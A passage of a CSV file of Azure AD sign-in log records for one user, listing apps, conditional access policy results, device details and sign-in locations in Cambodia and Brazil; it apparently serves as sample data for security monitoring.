'9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",1fc6d415-116e-44c9-a4fc-b8ef06cf0600,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,1fc6d415-116e-44c9-a4fc-b8ef06cf0600,SigninLogs,Sucess,13,105
+1590,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:39.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9949e6d9-5fdf-40d2-aedf-4bb62be18865,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:59,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",669c457e-4441-4eab-88a8-07b7b8ff0700,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,669c457e-4441-4eab-88a8-07b7b8ff0700,SigninLogs,Sucess,13,105
+1591,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:09.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,48eca259-39f7-454e-bcb4-fb433795c605,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:00,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",37105d23-9607-4aeb-a84b-5fa3d3710700,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,37105d23-9607-4aeb-a84b-5fa3d3710700,SigninLogs,Sucess,13,105
+1592,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:10.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,87a0e88f-f315-4e75-a695-b09ea13c1bcd,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:00,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",cbffb959-9fbe-4abe-95ed-0d85778c0800,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,cbffb959-9fbe-4abe-95ed-0d85778c0800,SigninLogs,Sucess,13,105
+1593,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:35.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e8344a57-b850-4b05-95b6-b439101cecb4,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",0cfe4b5b-09c7-4394-bb27-21b912ac0600,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,0cfe4b5b-09c7-4394-bb27-21b912ac0600,SigninLogs,Sucess,-20.54751015,-47.4056282
+1594,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:16.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1c4c9896-70da-455b-a366-378495cd6a7f,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:00,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",b125da47-83a8-4791-90e4-983bbc1a0600,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,b125da47-83a8-4791-90e4-983bbc1a0600,SigninLogs,Sucess,13,105
+1595,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:21.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,79869abf-af9c-42b1-b36e-52bf52dcbd09,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:00,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",b125da47-83a8-4791-90e4-983b131b0600,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,b125da47-83a8-4791-90e4-983b131b0600,SigninLogs,Sucess,13,105
+1596,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:28.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,331b8dad-4bd2-4242-b864-f972effdbb38,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:00,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",65ce963c-c870-4311-8389-19e591c70600,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,65ce963c-c870-4311-8389-19e591c70600,SigninLogs,Sucess,13,105
+1597,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:21.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1d016429-3b6f-46d4-9940-8ee5f9c290a8,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,O365 Suite UX,4345a7b9-9a63-4910-a426-35363201d503,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 